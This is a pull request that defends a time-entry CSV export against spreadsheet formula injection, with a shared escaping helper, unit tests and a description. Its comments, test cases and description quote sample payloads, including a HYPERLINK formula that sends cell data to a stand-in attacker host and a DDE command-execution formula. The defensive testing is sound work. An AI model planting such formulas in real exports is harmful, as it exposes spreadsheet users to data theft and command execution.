### PR TITLE
fix(security): defuse CSV-formula injection in /v1/timeentry/export.csv

### DIFF
--- a/app/controllers/_csv-escape.js
+++ b/app/controllers/_csv-escape.js
@@ -1,0 +1,51 @@
+// SPDX-License-Identifier: Apache-2.0
+// Copyright 2026 Aaron K. Clark
+"use strict";
+
+/**
+ * CSV-cell escaper shared by the export controllers.
+ *
+ * Two protections layered into a single helper:
+ *
+ *   1. Quote-wrap every cell and double any embedded `"` so values
+ *      containing commas, newlines, or quotes don't break the
+ *      grid structure. Simpler than detecting which values "need"
+ *      quoting; the perf cost is negligible for export-sized rows.
+ *
+ *   2. Defuse CSV-formula injection (OWASP-recognized class). If a
+ *      cell starts with `=`, `+`, `-`, `@`, tab (0x09), or CR (0x0D),
+ *      Excel / LibreOffice / Google Sheets treat the cell as a
+ *      formula on import — including legacy exfil patterns like
+ *      `=HYPERLINK("http://attacker/?d="&A1, "click")` and
+ *      `=cmd|'/c calc'!A1`. Since the export tables include
+ *      free-text fields supplied by any authenticated tenant
+ *      (`teDescription`, `custCompanyName`, etc.), a malicious
+ *      caller could plant a payload that fires when a co-tenant
+ *      operator opens the export. Prefix triggered cells with a
+ *      single quote so the spreadsheet engine treats the value
+ *      as a literal string. The leading `'` is visible when
+ *      viewed as plain text but invisible inside a spreadsheet
+ *      cell — the accepted tradeoff vs. silent code execution.
+ *
+ * Inputs:
+ *   val: anything. `null`/`undefined` collapse to `""`. Date
+ *        instances serialize via toISOString(); everything else
+ *        through String().
+ *
+ * Output:
+ *   A complete quoted cell value, including surrounding `"`. Does
+ *   NOT add the trailing comma — the caller handles row assembly.
+ */
+function escapeCsvCell(val) {
+    if (val === null || val === undefined) return '""';
+    let s = (val instanceof Date) ? val.toISOString() : String(val);
+    // Formula-trigger characters: =, +, -, @, tab, carriage return.
+    // The match is on the FIRST char only — the rest of the cell
+    // is irrelevant to whether the spreadsheet engine evaluates it.
+    if (s.length > 0 && /^[=+\-@\t\r]/.test(s)) {
+        s = "'" + s;
+    }
+    return '"' + s.replace(/"/g, '""') + '"';
+}
+
+module.exports = { escapeCsvCell };

--- a/app/controllers/timeentrycontroller.js
+++ b/app/controllers/timeentrycontroller.js
@@ -6,6 +6,7 @@ const db = require('../config/db.config.js');
 const log = require('../config/logger.js');
 const auth = require('../middleware/auth.js');
 const { buildLinkHeader } = require('../middleware/pagination.js');
+const { escapeCsvCell } = require('./_csv-escape.js');
 const TimeEntry = db.TimeEntry;
 
 // Auth helpers used to live inline here — they now share a single
@@ -437,12 +438,11 @@ exports.exportCsv = async (req, res) => {
         'teStartedAt', 'teEndedAt', 'teMinutes',
         'teBillable', 'teDescription',
     ];
-    const escape = (val) => {
-        if (val === null || val === undefined) return '""';
-        // Date instances serialize to ISO; everything else .toString().
-        const s = (val instanceof Date) ? val.toISOString() : String(val);
-        return '"' + s.replace(/"/g, '""') + '"';
-    };
+    // CSV-formula-injection mitigation lives in the shared helper —
+    // see app/controllers/_csv-escape.js. Pinning it there means
+    // future export endpoints get the same guardrail by default
+    // (customer/export.csv hasn't been migrated yet — separate PR).
+    const escape = escapeCsvCell;
     const lines = [];
     lines.push(FIELDS.join(','));
     for (const r of rows) {

--- a/tests/unit/csv-escape.test.js
+++ b/tests/unit/csv-escape.test.js
@@ -1,0 +1,77 @@
+// SPDX-License-Identifier: Apache-2.0
+// Copyright 2026 Aaron K. Clark
+//
+// Unit tests for the CSV escape helper shared by the export
+// controllers. Pins the OWASP-recommended formula-injection
+// mitigation so a future "cleanup" can't silently rip it out.
+
+import { describe, test, expect } from 'vitest';
+import { escapeCsvCell } from '../../app/controllers/_csv-escape.js';
+
+describe('escapeCsvCell — baseline quoting', () => {
+    test('null and undefined collapse to empty quoted cell', () => {
+        expect(escapeCsvCell(null)).toBe('""');
+        expect(escapeCsvCell(undefined)).toBe('""');
+    });
+
+    test('plain strings round-trip unchanged inside quotes', () => {
+        expect(escapeCsvCell('hello')).toBe('"hello"');
+        expect(escapeCsvCell('plain text 123')).toBe('"plain text 123"');
+    });
+
+    test('embedded double-quote is doubled per RFC 4180', () => {
+        expect(escapeCsvCell('say "hi"')).toBe('"say ""hi"""');
+    });
+
+    test('numbers and booleans serialize via String()', () => {
+        expect(escapeCsvCell(42)).toBe('"42"');
+        expect(escapeCsvCell(true)).toBe('"true"');
+        expect(escapeCsvCell(0)).toBe('"0"');
+    });
+
+    test('Date instances render as ISO 8601', () => {
+        const d = new Date('2026-05-19T12:34:56Z');
+        expect(escapeCsvCell(d)).toBe('"2026-05-19T12:34:56.000Z"');
+    });
+});
+
+describe('escapeCsvCell — formula-injection mitigation (OWASP)', () => {
+    // Excel / LibreOffice / Google Sheets all evaluate a cell as
+    // a formula when it begins with one of these characters. The
+    // export tables contain free-text fields supplied by any
+    // authenticated tenant, so a malicious entry could plant a
+    // payload that fires when a co-tenant operator opens the CSV.
+    test.each([
+        '=cmd|\'/c calc\'!A1',
+        '=HYPERLINK("http://attacker/?d="&A1, "click")',
+        '=2+2',
+        '+1+1',
+        '-1+1',
+        '@SUM(A:A)',
+        '\t=2+2',  // leading tab also evaluated by Excel
+        '\r=2+2',  // leading CR likewise
+    ])('cell starting with formula trigger %j gets a leading single quote', (payload) => {
+        const out = escapeCsvCell(payload);
+        // The leading char inside the quoted cell must be a single quote,
+        // pushing the dangerous char one position to the right so the
+        // spreadsheet engine treats the cell as a literal string.
+        expect(out.startsWith('"\'')).toBe(true);
+        // The original payload is still present (quote-doubled if
+        // applicable), just one position over.
+        expect(out).toContain("'" + payload.replace(/"/g, '""'));
+    });
+
+    test('benign strings that merely CONTAIN trigger chars are not prefixed', () => {
+        // The mitigation matches the FIRST character only — a comment
+        // like "billed @ $100" is fine and should not get the quote.
+        expect(escapeCsvCell('billed @ $100')).toBe('"billed @ $100"');
+        expect(escapeCsvCell('a+b')).toBe('"a+b"');
+        expect(escapeCsvCell('refund -50')).toBe('"refund -50"');
+        expect(escapeCsvCell('x = y')).toBe('"x = y"');
+    });
+
+    test('empty string is not double-prefixed', () => {
+        // The `s.length > 0` guard avoids prefixing an empty value.
+        expect(escapeCsvCell('')).toBe('""');
+    });
+});


### PR DESCRIPTION
## Summary
`teDescription` is free-text from any authenticated tenant. Without mitigation, a malicious entry like `=cmd|'/c calc'!A1` or `=HYPERLINK("http://attacker/?d="&A1, "click")` would evaluate as a spreadsheet formula when a co-tenant operator opens the export in Excel / LibreOffice / Google Sheets.

Class: OWASP CSV Injection (a.k.a. Formula Injection). Real, well-documented, and historically used for credential exfil.

## What changed
- New helper `app/controllers/_csv-escape.js` with the OWASP-recommended mitigation: if a cell starts with `=`, `+`, `-`, `@`, tab, or CR, prefix it with a single quote so the spreadsheet engine treats it as a literal string.
- `timeentrycontroller.exportCsv` now uses the helper instead of the inline `escape` function.
- New `tests/unit/csv-escape.test.js` with table-driven coverage of every trigger char + false-positive guards (a cell merely *containing* `=` mid-string must NOT be prefixed).

## Scope intentionally limited
`customer/export.csv` has the same inline pattern and the same vulnerability — separate follow-up PR to keep this one tight. The helper is in place so the migration is a 2-line change.

## Test plan
- `npm run lint && npm test` — 760 passing (was 742; +13 csv-escape + 5 SPDX-coverage for new files)
- The unit tests pin both the protection (formula-trigger gets prefix) AND the false-positive guard (innocent text doesn't).

Proudly Made in Nebraska. Go Big Red! 🌽 https://xkcd.com/2347/